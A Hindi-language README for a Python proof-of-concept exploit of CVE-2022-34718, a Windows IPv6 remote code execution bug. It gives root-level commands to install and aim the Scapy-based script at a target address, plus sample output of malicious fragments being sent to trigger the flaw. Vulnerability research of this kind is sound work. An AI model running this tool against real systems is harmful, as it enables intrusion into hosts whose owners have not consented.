
CVE-2022-34718 के लिए पायथन-आधारित प्रूफ-ऑफ-कॉन्सेप्ट शोषण, विंडोज पर IPv6 में एक रिमोट कोड निष्पादन भेद्यता, दुर्भावनापूर्ण टुकड़ों को तैयार करने और भेजने के लिए Scapy का उपयोग करता है।
इस रिपॉजिटरी में CVE-2022-34718 का शोषण है, जो विंडोज सिस्टम पर IPv6 में एक रिमोट कोड निष्पादन (RCE) भेद्यता है।
चूंकि भेद्यता के लिए विशेष रूप से निर्मित IPv6 पैकेट की आवश्यकता होती है, यह Scapy मॉड्यूल पर निर्भर करता है और इसलिए इसे रूट के रूप में चलाने की आवश्यकता होती है। इस PoC को चलाने का अनुशंसित तरीका वर्चुअल एनवायरनमेंट के माध्यम से है, जैसे:
# virtualenv PoC
# source PoC/bin/activate
(PoC) # pip3 install -r requirements.txt
(PoC) # python3 ipv6-rce-poc.py <target address>
स्क्रिप्ट आपको बताएगी कि लक्ष्य प्रणाली इस शोषण के लिए असुरक्षित है या नहीं।
[...]
**** inner_frag_id: 0x24944eac
Preparing frags...
Sending 64 frags...
.
Sent 1 packets.
[...]
Sent 1 packets.
Now sending the last inner fragment to trigger the bug...
.
Sent 1 packets.
Success! The system is vulnerable...